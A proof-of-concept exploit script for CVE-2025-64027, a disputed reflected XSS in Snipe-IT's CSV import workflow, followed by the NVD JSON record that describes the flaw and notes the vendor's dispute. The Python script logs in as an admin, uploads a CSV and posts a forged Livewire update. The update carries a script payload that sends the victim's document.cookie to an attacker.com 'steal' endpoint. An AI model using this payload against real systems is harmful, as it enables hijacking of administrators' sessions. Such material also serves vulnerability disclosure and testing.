CVE-2025-64027

# CVE-2025-64027 PoC - Snipe-IT CSV Import Reflected XSS # Attack Scenario: MITM proxy modification of Livewire request import requests import json target_url = "http://target-server/snipe-it" login_url = f"{target_url}/login" import_url = f"{target_url}/api/v1/imports" livewire_update_url = f"{target_url}/livewire/update" # Step 1: Authenticate as admin user session = requests.Session() login_data = { 'email': '[email protected]', 'password': 'admin_password' } session.post(login_url, data=login_data) # Step 2: Upload invalid CSV file to trigger import workflow csv_content = "asset_tag,serial\nTEST001,INVALID" upload_files = {'file': ('test.csv', csv_content, 'text/csv')} response = session.post(import_url, files=upload_files) # Step 3: Intercept and modify the Livewire update request # In real attack, use Burp Suite or MITM proxy to intercept # Modify the progress_message parameter in POST /livewire/update # Original request body structure: livewire_request = { 'component': 'ImportSoftware', # or relevant import component 'progress_message': '<script>alert(document.cookie)</script>', 'fingerprint': { 'id': 'some-component-id', 'name': 'import-component', 'path': 'admin/import', 'method': 'POST' }, 'serverMemo': { 'id': 'server-memo-id', 'data': {}, 'checksum': 'some-checksum' }, 'updates': [ { 'type': 'syncInput', 'payload': { 'name': 'progress_message', 'value': '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>' } } ] } # Step 4: Send modified request modified_response = session.post( livewire_update_url, json=livewire_request, headers={'Content-Type': 'application/json'} ) print("XSS payload sent. Check if cookie stealing script executes in admin browser.")

{"cve": {"id": "CVE-2025-64027", "sourceIdentifier": "[email protected]", "published": "2025-11-20T17:15:52.873", "lastModified": "2025-11-26T16:15:50.103", "vulnStatus": "Modified", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["disputed"]}], "descriptions": [{"lang": "en", "value": "Snipe-IT v8.3.4 (build 20218) contains a reflected cross-site scripting (XSS) vulnerability in the CSV Import workflow. When an invalid CSV file is uploaded, the application returns a progress_message value that is rendered as raw HTML in the admin interface. An attacker can intercept and modify the POST /livewire/update request to inject arbitrary HTML or JavaScript into the progress_message. Because the server accepts the modified input without sanitization and reflects it back to the user, arbitrary JavaScript executes in the browser of any authenticated admin who views the import page. NOTE: this is disputed by the Supplier because the report only demonstrates that an authenticated user can choose to conduct a man-in-the-middle attack against himself."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:snipeitapp:snipe-it:8.3.4:*:*:*:*:*:*:*", "matchCriteriaId": "D572C66C-FEB2-4976-AD9E-ECFB8507CDF7"}]}]}], "references": [{"url": "https://github.com/cybercrewinc/CVE-2025-64027/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/grokability/snipe-it", "source": "[email protected]", "tags": ["Product"]}]}}